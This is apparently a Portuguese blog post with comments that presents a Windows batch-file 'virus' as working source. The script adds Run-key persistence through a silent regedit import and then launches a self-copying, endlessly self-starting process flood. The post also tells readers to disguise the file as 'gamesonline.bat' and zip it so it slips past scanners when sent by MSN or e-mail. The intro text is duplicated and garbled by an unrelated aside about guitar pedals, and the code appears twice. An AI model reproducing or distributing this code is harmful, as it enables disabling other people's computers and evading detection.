Primeira Etapa
Aqui está um vírus simples que é um arquivo de lote.
Ele cria um arquivo reg (altera automaticamente as configurações do sistema) e coloca-lo no Registro (Banco de Dados) em seguida, ele cria um arquivo em C: \ chamado 2.bat
o arquivo 2.bat copia-se em outros arquivos e abre cada arquivo faz o mesmo 2.bat mas cada um loop (em um rack de efeito, pedal, ampliado ou pedaleira é o envio e retorno (send/return) do sinal que geralmente sai do estágio de pré-amplificação).
Por isso mantém a abertura para outros lotes que cada ciclo e abrir outros lotes. A única saída para arrancar esse vírus é entrar em modo de segurança.
Eu tentei este um comps casal(fornecer dados) e em um deles não era muito eficaz e que só abriu uma quantidade limitada de arquivos e eu não tenho certeza porque, já que eu era capaz de crt + alt + del (reiniciar), que eu não era capaz de fazer a outros comps que foram todos xp Winblows. 1600 haverá cerca de 1600 processos de abertura de outros processos abrindo outra 1.600 processos e assim por diante looping infinito (ciclo vicioso) em cada um deles.
Exemplo de um looping infinito:
Código
Aqui está um vírus simples que é um arquivo de lote.
Ele cria um arquivo reg (altera automaticamente as configurações do sistema) e coloca-lo no Registro (Banco de Dados) em seguida, ele cria um arquivo em C: \ chamado 2.bat
o arquivo 2.bat copia-se em outros arquivos e abre cada arquivo faz o mesmo 2.bat mas cada um loop (em um rack de efeito, pedal, ampliado ou pedaleira é o envio e retorno (send/return) do sinal que geralmente sai do estágio de pré-amplificação).
Por isso mantém a abertura para outros lotes que cada ciclo e abrir outros lotes. A única saída para arrancar esse vírus é entrar em modo de segurança.
Eu tentei este um comps casal(fornecer dados) e em um deles não era muito eficaz e que só abriu uma quantidade limitada de arquivos e eu não tenho certeza porque, já que eu era capaz de crt + alt + del (reiniciar), que eu não era capaz de fazer a outros comps que foram todos xp Winblows. 1600 haverá cerca de 1600 processos de abertura de outros processos abrindo outra 1.600 processos e assim por diante looping infinito (ciclo vicioso) em cada um deles.
Exemplo de um looping infinito:
Código
@echo off
del C:\1.reg
>>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\CurrentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
regedit.exe /s C:\1.reg
>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
>>"C:\2.bat" ECHO start C:\winblows\1.bat
>>"C:\2.bat" ECHO start C:\winblows\2.bat
>>"C:\2.bat" ECHO start C:\winblows\3.bat
>>"C:\2.bat" ECHO goto 1
start 2.bat
del C:\1.reg
del C:\1.reg
>>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\CurrentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
regedit.exe /s C:\1.reg
>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
>>"C:\2.bat" ECHO start C:\winblows\1.bat
>>"C:\2.bat" ECHO start C:\winblows\2.bat
>>"C:\2.bat" ECHO start C:\winblows\3.bat
>>"C:\2.bat" ECHO goto 1
start 2.bat
del C:\1.reg
Não me responsabilizo pelo o uso que você fará. Salve o arquivo em .bat , exemplo gamesonline.bat .
Aposto a pasta ser criada não abra pois seu PC será infectado.
Para que um ele não seja detectado caso você passe o arquivo pelo MSN ou e-mail é só zipar.
Para zipar é só criar uma pasta vazia e arrastar seu arquivo de vírus até ela, depois clique com o botão direito e clique em Adicionar para "nome do arquivo.rar"
Caso tenham alguma dúvida é só ir na opção comentar e irei responde-lo assim que possível.
De forma resumida, o que um isso permite, extrair arquivos de um outro computador?
ResponderExcluirO objetivo é apagar os arquivos existentes no PC infectado, vamos postar um outro artigo em que você poderá extrair arquivos de outro PC.
ResponderExcluirFique ligado e saiba como funciona a invasão a outra máquina.
Obrigado pelo comentário
Olá.
ResponderExcluirGostariam de fazer uma parceria com nosso blog? É novo, porém já esta começando a receber varias visitas.